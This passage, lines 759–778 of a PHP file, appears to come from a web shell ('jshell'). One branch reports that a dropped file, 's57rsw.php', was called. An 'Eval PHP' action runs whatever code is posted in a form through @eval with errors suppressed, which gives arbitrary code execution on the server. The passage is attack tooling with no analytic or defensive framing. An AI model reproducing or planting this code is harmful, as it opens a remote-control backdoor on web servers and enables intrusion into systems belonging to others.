  759. echo "<center><b>Successfuly called <a href='s57rsw.php' target='_blank'>s57rsw.php</a> !!</b><br/>";
  760. }else{
  761. echo "request failed";
  762. }
  763. }elseif($_GET['jshell_act'] == 'php')
  764. {
  765. $js->Jtitle('Eval PHP');
  767. if(isset($_POST['sbmt']))
  768. {
  769. echo "<hr>";
  770. @eval($_POST['code']);
  771. echo "<hr>";
  772. $js->Jshell_act('php');
  773. }else{
  774. $js->Jshell_act('php');
  775. }
  776. }
  777. }
  778. ?>
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